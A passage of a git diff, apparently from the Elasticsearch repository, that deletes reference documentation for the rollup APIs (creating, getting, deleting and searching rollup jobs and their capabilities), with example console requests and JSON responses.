: 0, - "primary_shard_size_mad_bytes" : 0 - }, - "data_content" : { - "node_count" : 0, - "index_count" : 0, - "total_shard_count" : 0, - "primary_shard_count" : 0, - "doc_count" : 0, - "total_size_bytes" : 0, - "primary_size_bytes" : 0, - "primary_shard_size_avg_bytes" : 0, - "primary_shard_size_median_bytes" : 0, - "primary_shard_size_mad_bytes" : 0 - }, - "data_hot" : { - "node_count" : 0, - "index_count" : 0, - "total_shard_count" : 0, - "primary_shard_count" : 0, - "doc_count" : 0, - "total_size_bytes" : 0, - "primary_size_bytes" : 0, - "primary_shard_size_avg_bytes" : 0, - "primary_shard_size_median_bytes" : 0, - "primary_shard_size_mad_bytes" : 0 - } - } -} ------------------------------------------------------------- -// TESTRESPONSE[s/"detectors" : \{[^\}]*\},/"detectors" : $body.$_path,/] -// TESTRESPONSE[s/"model_size" : \{[^\}]*\},/"model_size" : $body.$_path,/] -// TESTRESPONSE[s/"eql" : \{[^\}]*\},/"eql" : $body.$_path,/] -// TESTRESPONSE[s/"ilm" : \{[^\}]*\},/"ilm" : $body.$_path,/] -// TESTRESPONSE[s/"slm" : \{[^\}]*\},/"slm" : $body.$_path,/] -// TESTRESPONSE[s/ : true/ : $body.$_path/] -// TESTRESPONSE[s/ : false/ : $body.$_path/] -// TESTRESPONSE[s/ : (\-)?[0-9]+/ : $body.$_path/] -// These replacements do a few things: -// 1. Handling eql, which is disabled by default on release builds and enabled -// everywhere else during the initial implementation phase until its release -// 2. Ignore the contents of the `ilm` and `slm` objects because they don't know -// all of the policies that will be in them. -// 3. Ignore the contents of the `analytics` object because it might contain -// additional stats -// 4. All of the numbers and strings on the right hand side of *every* field in -// the response are ignored. So we're really only asserting things about the -// the shape of this response, not the values in it. 
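-
-As noted in the query parameters section above, the request also accepts the
-standard `master_timeout` parameter. A minimal sketch (the `10s` value is
-arbitrary):
-
-[source,console]
-------------------------------------------------------------
-GET /_xpack/usage?master_timeout=10s
-------------------------------------------------------------
-// TEST[skip:illustrative use of the master_timeout query parameter]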
diff --git a/docs/reference/rollup/api-quickref.asciidoc b/docs/reference/rollup/api-quickref.asciidoc deleted file mode 100644 index 89c29b98b59..00000000000 --- a/docs/reference/rollup/api-quickref.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-api-quickref]] -=== {rollup-cap} API quick reference -++++ -API quick reference -++++ - -experimental[] - -Most rollup endpoints have the following base: - -[source,js] ----- -/_rollup/ ----- -// NOTCONSOLE - -[discrete] -[[rollup-api-jobs]] -==== /job/ - -* {ref}/rollup-put-job.html[PUT /_rollup/job/+++]: Create a {rollup-job} -* {ref}/rollup-get-job.html[GET /_rollup/job]: List {rollup-jobs} -* {ref}/rollup-get-job.html[GET /_rollup/job/+++]: Get {rollup-job} details -* {ref}/rollup-start-job.html[POST /_rollup/job//_start]: Start a {rollup-job} -* {ref}/rollup-stop-job.html[POST /_rollup/job//_stop]: Stop a {rollup-job} -* {ref}/rollup-delete-job.html[DELETE /_rollup/job/+++]: Delete a {rollup-job} - -[discrete] -[[rollup-api-data]] -==== /data/ - -* {ref}/rollup-get-rollup-caps.html[GET /_rollup/data//_rollup_caps+++]: Get Rollup Capabilities -* {ref}/rollup-get-rollup-index-caps.html[GET //_rollup/data/+++]: Get Rollup Index Capabilities - -[discrete] -[[rollup-api-index]] -==== // - -* {ref}/rollup-search.html[GET //_rollup_search]: Search rollup data diff --git a/docs/reference/rollup/apis/delete-job.asciidoc b/docs/reference/rollup/apis/delete-job.asciidoc deleted file mode 100644 index 12ad52eceda..00000000000 --- a/docs/reference/rollup/apis/delete-job.asciidoc +++ /dev/null @@ -1,92 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-delete-job]] -=== Delete {rollup-jobs} API -[subs="attributes"] -++++ -Delete {rollup-jobs} -++++ - -Deletes an existing {rollup-job}. - -experimental[] - -[[rollup-delete-job-request]] -==== {api-request-title} - -`DELETE _rollup/job/` - -[[rollup-delete-job-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage` or -`manage_rollup` cluster privileges to use this API. For more information, see -<>. - -[[rollup-delete-job-desc]] -==== {api-description-title} - -A job must be *stopped* first before it can be deleted. If you attempt to delete -a started job, an error occurs. Similarly, if you attempt to delete a -nonexistent job, an exception occurs. - -[IMPORTANT] -=============================== -When a job is deleted, that only removes the process that is actively monitoring -and rolling up data. It does not delete any previously rolled up data. This is -by design; a user may wish to roll up a static dataset. Because the dataset is -static, once it has been fully rolled up there is no need to keep the indexing -rollup job around (as there will be no new data). So the job can be deleted, -leaving behind the rolled up data for analysis. - -If you wish to also remove the rollup data, and the rollup index only contains -the data for a single job, you can simply delete the whole rollup index. If the -rollup index stores data from several jobs, you must issue a delete-by-query -that targets the rollup job's ID in the rollup index. - -[source,js] --------------------------------------------------- -POST my_rollup_index/_delete_by_query -{ - "query": { - "term": { - "_rollup.id": "the_rollup_job_id" - } - } -} --------------------------------------------------- -// NOTCONSOLE -=============================== - -[[rollup-delete-job-path-params]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the job. 
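-
-Because only a stopped job can be deleted, it can be useful to confirm the job
-state before issuing the delete. A minimal sketch using the get {rollup-jobs}
-API, assuming a job named `sensor`:
-
-[source,console]
---------------------------------------------------
-GET _rollup/job/sensor
---------------------------------------------------
-// TEST[skip:sketch for checking the job state before deletion]
-
-The `job_state` field in the `status` object of the response indicates whether
-the job is currently `started` or `stopped`.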
- -[[rollup-delete-job-response-codes]] -==== {api-response-codes-title} - -`404` (Missing resources):: - This code indicates that there are no resources that match the request. It - occurs if you try to delete a job that doesn't exist. - -[[rollup-delete-job-example]] -==== {api-example-title} - -If we have a rollup job named `sensor`, it can be deleted with: - -[source,console] --------------------------------------------------- -DELETE _rollup/job/sensor --------------------------------------------------- -// TEST[setup:sensor_rollup_job] - -Which will return the response: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- diff --git a/docs/reference/rollup/apis/get-job.asciidoc b/docs/reference/rollup/apis/get-job.asciidoc deleted file mode 100644 index 4219de26be7..00000000000 --- a/docs/reference/rollup/apis/get-job.asciidoc +++ /dev/null @@ -1,323 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-get-job]] -=== Get {rollup-jobs} API -++++ -Get job -++++ - -Retrieves the configuration, stats, and status of {rollup-jobs}. - -experimental[] - -[[rollup-get-job-request]] -==== {api-request-title} - -`GET _rollup/job/` - -[[rollup-get-job-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor`, -`monitor_rollup`, `manage` or `manage_rollup` cluster privileges to use this API. -For more information, see <>. - -[[rollup-get-job-desc]] -==== {api-description-title} - -The API can return the details for a single {rollup-job} or for all {rollup-jobs}. - -NOTE: This API returns only active (both `STARTED` and `STOPPED`) jobs. If a job -was created, ran for a while then deleted, this API does not return any details -about that job. - -For details about a historical {rollup-job}, the -<> may be more useful. - -[[rollup-get-job-path-params]] -==== {api-path-parms-title} - -``:: - (Optional, string) Identifier for the {rollup-job}. If it is `_all` or omitted, - the API returns all {rollup-jobs}. - -[role="child_attributes"] -[[rollup-get-job-response-body]] -==== {api-response-body-title} - -`jobs`:: -(array) An array of {rollup-job} resources. -+ -.Properties of {rollup-job} resources -[%collapsible%open] -==== -`config`::: -(object) Contains the configuration for the {rollup-job}. This information is -identical to the configuration that was supplied when creating the job via the -<>. - -`stats`::: -(object) Contains transient statistics about the {rollup-job}, such as how many -documents have been processed and how many rollup summary docs have been -indexed. These stats are not persisted. If a node is restarted, these stats are -reset. - -`status`::: -(object) Contains the current status of the indexer for the {rollup-job}. The -possible values and their meanings are: -+ -- `stopped` means the indexer is paused and will not process data, even if its -cron interval triggers. -- `started` means the indexer is running, but not actively indexing data. When -the cron interval triggers, the job's indexer will begin to process data. -- `indexing` means the indexer is actively processing data and creating new -rollup documents. When in this state, any subsequent cron interval triggers will -be ignored because the job is already active with the prior trigger. -- `abort` is a transient state, which is usually not witnessed by the user. It -is used if the task needs to be shut down for some reason (job has been deleted, -an unrecoverable error has been encountered, etc). 
Shortly after the `abort` -state is set, the job will remove itself from the cluster. -==== - -[[rollup-get-job-example]] -==== {api-examples-title} - -If we have already created a rollup job named `sensor`, the details about the -job can be retrieved with: - -[source,console] --------------------------------------------------- -GET _rollup/job/sensor --------------------------------------------------- -// TEST[setup:sensor_rollup_job] - -The API yields the following response: - -[source,console-result] ----- -{ - "jobs": [ - { - "config": { - "id": "sensor", - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "groups": { - "date_histogram": { - "fixed_interval": "1h", - "delay": "7d", - "field": "timestamp", - "time_zone": "UTC" - }, - "terms": { - "fields": [ - "node" - ] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": [ - "min", - "max", - "sum" - ] - }, - { - "field": "voltage", - "metrics": [ - "avg" - ] - } - ], - "timeout": "20s", - "page_size": 1000 - }, - "status": { - "job_state": "stopped", - "upgraded_doc_id": true - }, - "stats": { - "pages_processed": 0, - "documents_processed": 0, - "rollups_indexed": 0, - "trigger_count": 0, - "index_failures": 0, - "index_time_in_ms": 0, - "index_total": 0, - "search_failures": 0, - "search_time_in_ms": 0, - "search_total": 0, - "processing_time_in_ms": 0, - "processing_total": 0 - } - } - ] -} ----- - -The `jobs` array contains a single job (`id: sensor`) since we requested a single job in the endpoint's URL. -If we add another job, we can see how multi-job responses are handled: - -[source,console] --------------------------------------------------- -PUT _rollup/job/sensor2 <1> -{ - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "page_size": 1000, - "groups": { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h", - "delay": "7d" - }, - "terms": { - "fields": [ "node" ] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": [ "min", "max", "sum" ] - }, - { - "field": "voltage", - "metrics": [ "avg" ] - } - ] -} - -GET _rollup/job/_all <2> --------------------------------------------------- -// TEST[setup:sensor_rollup_job] -<1> We create a second job with name `sensor2` -<2> Then request all jobs by using `_all` in the GetJobs API - -Which will yield the following response: - -[source,js] ----- -{ - "jobs": [ - { - "config": { - "id": "sensor2", - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "groups": { - "date_histogram": { - "fixed_interval": "1h", - "delay": "7d", - "field": "timestamp", - "time_zone": "UTC" - }, - "terms": { - "fields": [ - "node" - ] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": [ - "min", - "max", - "sum" - ] - }, - { - "field": "voltage", - "metrics": [ - "avg" - ] - } - ], - "timeout": "20s", - "page_size": 1000 - }, - "status": { - "job_state": "stopped", - "upgraded_doc_id": true - }, - "stats": { - "pages_processed": 0, - "documents_processed": 0, - "rollups_indexed": 0, - "trigger_count": 0, - "index_failures": 0, - "index_time_in_ms": 0, - "index_total": 0, - "search_failures": 0, - "search_time_in_ms": 0, - "search_total": 0, - "processing_time_in_ms": 0, - "processing_total": 0 - } - }, - { - "config": { - "id": "sensor", - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "groups": { - "date_histogram": { - "fixed_interval": "1h", - "delay": "7d", - 
"field": "timestamp", - "time_zone": "UTC" - }, - "terms": { - "fields": [ - "node" - ] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": [ - "min", - "max", - "sum" - ] - }, - { - "field": "voltage", - "metrics": [ - "avg" - ] - } - ], - "timeout": "20s", - "page_size": 1000 - }, - "status": { - "job_state": "stopped", - "upgraded_doc_id": true - }, - "stats": { - "pages_processed": 0, - "documents_processed": 0, - "rollups_indexed": 0, - "trigger_count": 0, - "index_failures": 0, - "index_time_in_ms": 0, - "index_total": 0, - "search_failures": 0, - "search_time_in_ms": 0, - "search_total": 0, - "processing_time_in_ms": 0, - "processing_total": 0 - } - } - ] -} ----- -// NOTCONSOLE diff --git a/docs/reference/rollup/apis/put-job.asciidoc b/docs/reference/rollup/apis/put-job.asciidoc deleted file mode 100644 index 43a2f9f6f4f..00000000000 --- a/docs/reference/rollup/apis/put-job.asciidoc +++ /dev/null @@ -1,290 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-put-job]] -=== Create {rollup-jobs} API -[subs="attributes"] -++++ -Create {rollup-jobs} -++++ - -Creates a {rollup-job}. - -experimental[] - -[[rollup-put-job-api-request]] -==== {api-request-title} - -`PUT _rollup/job/` - -[[rollup-put-job-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage` or -`manage_rollup` cluster privileges to use this API. For more information, see -<>. - -[[rollup-put-job-api-desc]] -==== {api-description-title} - -The {rollup-job} configuration contains all the details about how the job should -run, when it indexes documents, and what future queries will be able to execute -against the rollup index. - -There are three main sections to the job configuration: the logistical details -about the job (cron schedule, etc), the fields that are used for grouping, and -what metrics to collect for each group. - -Jobs are created in a `STOPPED` state. You can start them with the -<>. - -[[rollup-put-job-api-path-params]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the {rollup-job}. This can be any - alphanumeric string and uniquely identifies the data that is associated with - the {rollup-job}. The ID is persistent; it is stored with the rolled up data. - If you create a job, let it run for a while, then delete the job, the data - that the job rolled up is still be associated with this job ID. You cannot - create a new job with the same ID since that could lead to problems with - mismatched job configurations. - -[role="child_attributes"] -[[rollup-put-job-api-request-body]] -==== {api-request-body-title} - -`cron`:: -(Required, string) A cron string which defines the intervals when the -{rollup-job} should be executed. When the interval triggers, the indexer -attempts to rollup the data in the index pattern. The cron pattern is -unrelated to the time interval of the data being rolled up. For example, you -may wish to create hourly rollups of your document but to only run the indexer -on a daily basis at midnight, as defined by the cron. The cron pattern is -defined just like a {watcher} cron schedule. - -//Begin groups -[[rollup-groups-config]] -`groups`:: -(Required, object) Defines the grouping fields and aggregations that are -defined for this {rollup-job}. These fields will then be available later for -aggregating into buckets. -+ -These aggs and fields can be used in any combination. 
Think of the `groups` -configuration as defining a set of tools that can later be used in aggregations -to partition the data. Unlike raw data, we have to think ahead to which fields -and aggregations might be used. Rollups provide enough flexibility that you -simply need to determine _which_ fields are needed, not _in what order_ they are -needed. -+ -There are three types of groupings currently available: `date_histogram`, -`histogram`, and `terms`. -+ -.Properties of `groups` -[%collapsible%open] -==== -//Begin date_histogram -`date_histogram`::: -(Required, object) A date histogram group aggregates a `date` field into -time-based buckets. This group is *mandatory*; you currently cannot rollup -documents without a timestamp and a `date_histogram` group. The -`date_histogram` group has several parameters: -+ -.Properties of `date_histogram` -[%collapsible%open] -===== -`calendar_interval` or `fixed_interval`:::: -(Required, <>) The interval of time buckets to be -generated when rolling up. For example, `60m` produces 60 minute (hourly) -rollups. This follows standard time formatting syntax as used elsewhere in {es}. -The interval defines the _minimum_ interval that can be aggregated only. If -hourly (`60m`) intervals are configured, <> -can execute aggregations with 60m or greater (weekly, monthly, etc) intervals. -So define the interval as the smallest unit that you wish to later query. For -more information about the difference between calendar and fixed time -intervals, see <>. -+ --- -NOTE: Smaller, more granular intervals take up proportionally more space. - --- - -`delay`:::: -(Optional,<>) How long to wait before rolling up new -documents. By default, the indexer attempts to roll up all data that is -available. However, it is not uncommon for data to arrive out of order, -sometimes even a few days late. The indexer is unable to deal with data that -arrives after a time-span has been rolled up. That is to say, there is no -provision to update already-existing rollups. -+ --- -Instead, you should specify a `delay` that matches the longest period of time -you expect out-of-order data to arrive. For example, a `delay` of `1d` -instructs the indexer to roll up documents up to `now - 1d`, which provides -a day of buffer time for out-of-order documents to arrive. --- - -`field`:::: -(Required, string) The date field that is to be rolled up. - -`time_zone`:::: -(Optional, string) Defines what time_zone the rollup documents are stored as. -Unlike raw data, which can shift timezones on the fly, rolled documents have to -be stored with a specific timezone. By default, rollup documents are stored -in `UTC`. -===== -//End date_histogram - -//Begin histogram -`histogram`::: -(Optional, object) The histogram group aggregates one or more numeric fields -into numeric histogram intervals. -+ -.Properties of `histogram` -[%collapsible%open] -===== -`fields`:::: -(Required, array) The set of fields that you wish to build histograms for. All -fields specified must be some kind of numeric. Order does not matter. - -`interval`:::: -(Required, integer) The interval of histogram buckets to be generated when -rolling up. For example, a value of `5` creates buckets that are five units wide -(`0-5`, `5-10`, etc). Note that only one interval can be specified in the -`histogram` group, meaning that all fields being grouped via the histogram -must share the same interval. 
-===== -//End histogram - -//Begin terms -`terms`::: -(Optional, object) The terms group can be used on `keyword` or numeric fields to -allow bucketing via the `terms` aggregation at a later point. The indexer -enumerates and stores _all_ values of a field for each time-period. This can be -potentially costly for high-cardinality groups such as IP addresses, especially -if the time-bucket is particularly sparse. -+ --- -TIP: While it is unlikely that a rollup will ever be larger in size than the raw -data, defining `terms` groups on multiple high-cardinality fields can -effectively reduce the compression of a rollup to a large extent. You should be -judicious which high-cardinality fields are included for that reason. - --- -+ -.Properties of `terms` -[%collapsible%open] -===== - -`fields`:::: -(Required, string) The set of fields that you wish to collect terms for. This -array can contain fields that are both `keyword` and numerics. Order does not -matter. -===== -//End terms -==== -//End groups - -`index_pattern`:: -(Required, string) The index or index pattern to roll up. Supports -wildcard-style patterns (`logstash-*`). The job attempts to rollup the entire -index or index-pattern. -+ --- -NOTE: The `index_pattern` cannot be a pattern that would also match the -destination `rollup_index`. For example, the pattern `foo-*` would match the -rollup index `foo-rollup`. This situation would cause problems because the -{rollup-job} would attempt to rollup its own data at runtime. If you attempt to -configure a pattern that matches the `rollup_index`, an exception occurs to -prevent this behavior. - --- - -//Begin metrics -[[rollup-metrics-config]] -`metrics`:: -(Optional, object) Defines the metrics to collect for each grouping tuple. By -default, only the doc_counts are collected for each group. To make rollup useful, -you will often add metrics like averages, mins, maxes, etc. Metrics are defined -on a per-field basis and for each field you configure which metric should be -collected. -+ -The `metrics` configuration accepts an array of objects, where each object has -two parameters. -+ -.Properties of metric objects -[%collapsible%open] -==== -`field`::: -(Required, string) The field to collect metrics for. This must be a numeric of -some kind. - -`metrics`::: -(Required, array) An array of metrics to collect for the field. At least one -metric must be configured. Acceptable metrics are `min`,`max`,`sum`,`avg`, and -`value_count`. -==== -//End metrics - -`page_size`:: -(Required, integer) The number of bucket results that are processed on each -iteration of the rollup indexer. A larger value tends to execute faster, but -requires more memory during processing. This value has no effect on how the data -is rolled up; it is merely used for tweaking the speed or memory cost of -the indexer. - -`rollup_index`:: -(Required, string) The index that contains the rollup results. The index can -be shared with other {rollup-jobs}. The data is stored so that it doesn't -interfere with unrelated jobs. 
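-
-The example in the next section uses a `fixed_interval` date histogram with a
-`terms` group. As a sketch of the other options described above, a
-hypothetical job that combines a calendar interval with a `histogram` group
-might look like this (the job name and the choice of histogram field are
-illustrative only):
-
-[source,console]
---------------------------------------------------
-PUT _rollup/job/sensor_daily
-{
-  "index_pattern": "sensor-*",
-  "rollup_index": "sensor_rollup",
-  "cron": "0 0 1 * * ?",
-  "page_size": 1000,
-  "groups": {
-    "date_histogram": {
-      "field": "timestamp",
-      "calendar_interval": "1d",
-      "delay": "1d"
-    },
-    "histogram": {
-      "fields": [ "voltage" ],
-      "interval": 5
-    },
-    "terms": {
-      "fields": [ "node" ]
-    }
-  },
-  "metrics": [
-    { "field": "temperature", "metrics": [ "min", "max", "sum" ] }
-  ]
-}
---------------------------------------------------
-// TEST[skip:illustrative sketch of calendar_interval and histogram groups]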
- -[[rollup-put-job-api-example]] -==== {api-example-title} - -The following example creates a {rollup-job} named `sensor`, targeting the -`sensor-*` index pattern: - -[source,console] --------------------------------------------------- -PUT _rollup/job/sensor -{ - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "page_size": 1000, - "groups": { <1> - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h", - "delay": "7d" - }, - "terms": { - "fields": [ "node" ] - } - }, - "metrics": [ <2> - { - "field": "temperature", - "metrics": [ "min", "max", "sum" ] - }, - { - "field": "voltage", - "metrics": [ "avg" ] - } - ] -} --------------------------------------------------- -// TEST[setup:sensor_index] -<1> This configuration enables date histograms to be used on the `timestamp` -field and `terms` aggregations to be used on the `node` field. -<2> This configuration defines metrics over two fields: `temperature` and -`voltage`. For the `temperature` field, we are collecting the min, max, and -sum of the temperature. For `voltage`, we are collecting the average. - -When the job is created, you receive the following results: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- diff --git a/docs/reference/rollup/apis/rollup-caps.asciidoc b/docs/reference/rollup/apis/rollup-caps.asciidoc deleted file mode 100644 index 1d0e620a94f..00000000000 --- a/docs/reference/rollup/apis/rollup-caps.asciidoc +++ /dev/null @@ -1,190 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-get-rollup-caps]] -=== Get {rollup-job} capabilities API -++++ -Get rollup caps -++++ - -Returns the capabilities of any {rollup-jobs} that have been configured for a -specific index or index pattern. - -experimental[] - -[[rollup-get-rollup-caps-request]] -==== {api-request-title} - -`GET _rollup/data/` - -[[rollup-get-rollup-caps-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor`, -`monitor_rollup`, `manage` or `manage_rollup` cluster privileges to use this API. -For more information, see <>. - -[[rollup-get-rollup-caps-desc]] -==== {api-description-title} - -This API is useful because a {rollup-job} is often configured to rollup only a -subset of fields from the source index. Furthermore, only certain aggregations -can be configured for various fields, leading to a limited subset of -functionality depending on that configuration. - -This API enables you to inspect an index and determine: - -1. Does this index have associated rollup data somewhere in the cluster? -2. If yes to the first question, what fields were rolled up, what aggregations -can be performed, and where does the data live? - -[[rollup-get-rollup-path-params]] -==== {api-path-parms-title} - -``:: - (string) Index, indices or index-pattern to return rollup capabilities for. - `_all` may be used to fetch rollup capabilities from all jobs. - - -[[rollup-get-rollup-example]] -==== {api-examples-title} - -Imagine we have an index named `sensor-1` full of raw data. We know that the -data will grow over time, so there will be a `sensor-2`, `sensor-3`, etc. 
Let's -create a {rollup-job} that targets the index pattern `sensor-*` to accommodate -this future scaling: - -[source,console] --------------------------------------------------- -PUT _rollup/job/sensor -{ - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "page_size": 1000, - "groups": { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h", - "delay": "7d" - }, - "terms": { - "fields": [ "node" ] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": [ "min", "max", "sum" ] - }, - { - "field": "voltage", - "metrics": [ "avg" ] - } - ] -} --------------------------------------------------- -// TEST[setup:sensor_index] - -We can then retrieve the rollup capabilities of that index pattern (`sensor-*`) -via the following command: - -[source,console] --------------------------------------------------- -GET _rollup/data/sensor-* --------------------------------------------------- -// TEST[continued] - -Which will yield the following response: - -[source,console-result] ----- -{ - "sensor-*" : { - "rollup_jobs" : [ - { - "job_id" : "sensor", - "rollup_index" : "sensor_rollup", - "index_pattern" : "sensor-*", - "fields" : { - "node" : [ - { - "agg" : "terms" - } - ], - "temperature" : [ - { - "agg" : "min" - }, - { - "agg" : "max" - }, - { - "agg" : "sum" - } - ], - "timestamp" : [ - { - "agg" : "date_histogram", - "time_zone" : "UTC", - "fixed_interval" : "1h", - "delay": "7d" - } - ], - "voltage" : [ - { - "agg" : "avg" - } - ] - } - } - ] - } -} ----- - -The response that is returned contains information that is similar to the -original rollup configuration, but formatted differently. First, there are some -house-keeping details: the {rollup-job} ID, the index that holds the rolled data, -and the index pattern that the job was targeting. - -Next it shows a list of fields that contain data eligible for rollup searches. -Here we see four fields: `node`, `temperature`, `timestamp` and `voltage`. Each -of these fields list the aggregations that are possible. For example, you can -use a min, max or sum aggregation on the `temperature` field, but only a -`date_histogram` on `timestamp`. - -Note that the `rollup_jobs` element is an array; there can be multiple, -independent jobs configured for a single index or index pattern. Each of these -jobs may have different configurations, so the API returns a list of all the -various configurations available. - -We could also retrieve the same information with a request to `_all`: - -[source,console] --------------------------------------------------- -GET _rollup/data/_all --------------------------------------------------- -// TEST[continued] - -But note that if we use the concrete index name (`sensor-1`), we'll retrieve no -rollup capabilities: - -[source,console] --------------------------------------------------- -GET _rollup/data/sensor-1 --------------------------------------------------- -// TEST[continued] - -[source,console-result] ----- -{ - -} ----- - -Why is this? The original {rollup-job} was configured against a specific index -pattern (`sensor-*`) not a concrete index (`sensor-1`). So while the index -belongs to the pattern, the {rollup-job} is only valid across the entirety of -the pattern not just one of it's containing indices. So for that reason, the -get rollup capabilities API only returns information based on the originally -configured index name or pattern. 
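-
-If you need the capabilities keyed by the concrete rollup index itself rather
-than by the original index pattern, the get rollup index capabilities API
-(described next) serves that purpose. A minimal sketch, reusing the
-`sensor_rollup` index from the example above:
-
-[source,console]
---------------------------------------------------
-GET /sensor_rollup/_rollup/data
---------------------------------------------------
-// TEST[skip:sketch; see the get rollup index capabilities API]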
diff --git a/docs/reference/rollup/apis/rollup-index-caps.asciidoc b/docs/reference/rollup/apis/rollup-index-caps.asciidoc deleted file mode 100644 index b8cce32db5d..00000000000 --- a/docs/reference/rollup/apis/rollup-index-caps.asciidoc +++ /dev/null @@ -1,167 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-get-rollup-index-caps]] -=== Get rollup index capabilities API -++++ -Get rollup index caps -++++ - -Returns the rollup capabilities of all jobs inside of a rollup index (e.g. the -index where rollup data is stored). - -experimental[] - -[[rollup-get-rollup-index-caps-request]] -==== {api-request-title} - -`GET /_rollup/data` - -[[rollup-get-rollup-index-caps-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `read` index -privilege on the index that stores the rollup results. For more information, see -<>. - -[[rollup-get-rollup-index-caps-desc]] -==== {api-description-title} - -A single rollup index may store the data for multiple {rollup-jobs}, and may -have a variety of capabilities depending on those jobs. - -This API will allow you to determine: - -1. What jobs are stored in an index (or indices specified via a pattern)? -2. What target indices were rolled up, what fields were used in those rollups -and what aggregations can be performed on each job? - -[[rollup-get-rollup-index-caps-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) Data stream or index to check for rollup capabilities. -Wildcard (`*`) expressions are supported. - -[[rollup-get-rollup-index-caps-example]] -==== {api-examples-title} - -Imagine we have an index named `sensor-1` full of raw data. We know that the -data will grow over time, so there will be a `sensor-2`, `sensor-3`, etc. -Let's create a {rollup-job} that stores its data in `sensor_rollup`: - -[source,console] --------------------------------------------------- -PUT _rollup/job/sensor -{ - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "page_size": 1000, - "groups": { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h", - "delay": "7d" - }, - "terms": { - "fields": [ "node" ] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": [ "min", "max", "sum" ] - }, - { - "field": "voltage", - "metrics": [ "avg" ] - } - ] -} --------------------------------------------------- -// TEST[setup:sensor_index] - -If at a later date, we'd like to determine what jobs and capabilities were -stored in the `sensor_rollup` index, we can use the get rollup index API: - -[source,console] --------------------------------------------------- -GET /sensor_rollup/_rollup/data --------------------------------------------------- -// TEST[continued] - -Note how we are requesting the concrete rollup index name (`sensor_rollup`) as -the first part of the URL. 
This will yield the following response: - -[source,console-result] ----- -{ - "sensor_rollup" : { - "rollup_jobs" : [ - { - "job_id" : "sensor", - "rollup_index" : "sensor_rollup", - "index_pattern" : "sensor-*", - "fields" : { - "node" : [ - { - "agg" : "terms" - } - ], - "temperature" : [ - { - "agg" : "min" - }, - { - "agg" : "max" - }, - { - "agg" : "sum" - } - ], - "timestamp" : [ - { - "agg" : "date_histogram", - "time_zone" : "UTC", - "fixed_interval" : "1h", - "delay": "7d" - } - ], - "voltage" : [ - { - "agg" : "avg" - } - ] - } - } - ] - } -} ----- - - -The response that is returned contains information that is similar to the -original rollup configuration, but formatted differently. First, there are some -house-keeping details: the {rollup-job} ID, the index that holds the rolled data, -the index pattern that the job was targeting. - -Next it shows a list of fields that contain data eligible for rollup searches. -Here we see four fields: `node`, `temperature`, `timestamp` and `voltage`. Each -of these fields list the aggregations that are possible. For example, you can -use a min, max, or sum aggregation on the `temperature` field, but only a -`date_histogram` on `timestamp`. - -Note that the `rollup_jobs` element is an array; there can be multiple, -independent jobs configured for a single index or index pattern. Each of these -jobs may have different configurations, so the API returns a list of all the -various configurations available. - -Like other APIs that interact with indices, you can specify index patterns -instead of explicit indices: - -[source,console] --------------------------------------------------- -GET /*_rollup/_rollup/data --------------------------------------------------- -// TEST[continued] - diff --git a/docs/reference/rollup/apis/rollup-search.asciidoc b/docs/reference/rollup/apis/rollup-search.asciidoc deleted file mode 100644 index 19bfb125467..00000000000 --- a/docs/reference/rollup/apis/rollup-search.asciidoc +++ /dev/null @@ -1,267 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-search]] -=== Rollup search -++++ -Rollup search -++++ - -Enables searching rolled-up data using the standard query DSL. - -experimental[] - -[[rollup-search-request]] -==== {api-request-title} - -`GET /_rollup_search` - -[[rollup-search-desc]] -==== {api-description-title} - -The rollup search endpoint is needed because, internally, rolled-up documents -utilize a different document structure than the original data. The rollup search -endpoint rewrites standard query DSL into a format that matches the rollup -documents, then takes the response and rewrites it back to what a client would -expect given the original query. - -[[rollup-search-path-params]] -==== {api-path-parms-title} - -``:: -+ --- -(Required, string) -Comma-separated list of data streams and indices used to limit -the request. Wildcard expressions (`*`) are supported. - -This target can include both rollup and non-rollup indices. - -Rules for the `` parameter: - -- At least one data stream, index, or wildcard expression must be specified. -This target can include a rollup or non-rollup index. For data streams, the -stream's backing indices can only serve as non-rollup indices. Omitting the -`` parameter or using `_all` is not permitted. -- Multiple non-rollup indices may be specified. -- Only one rollup index may be specified. If more than one are supplied, an -exception occurs. -- Wildcard expressions may be used, but, if they match more than one rollup index, an -exception occurs. 
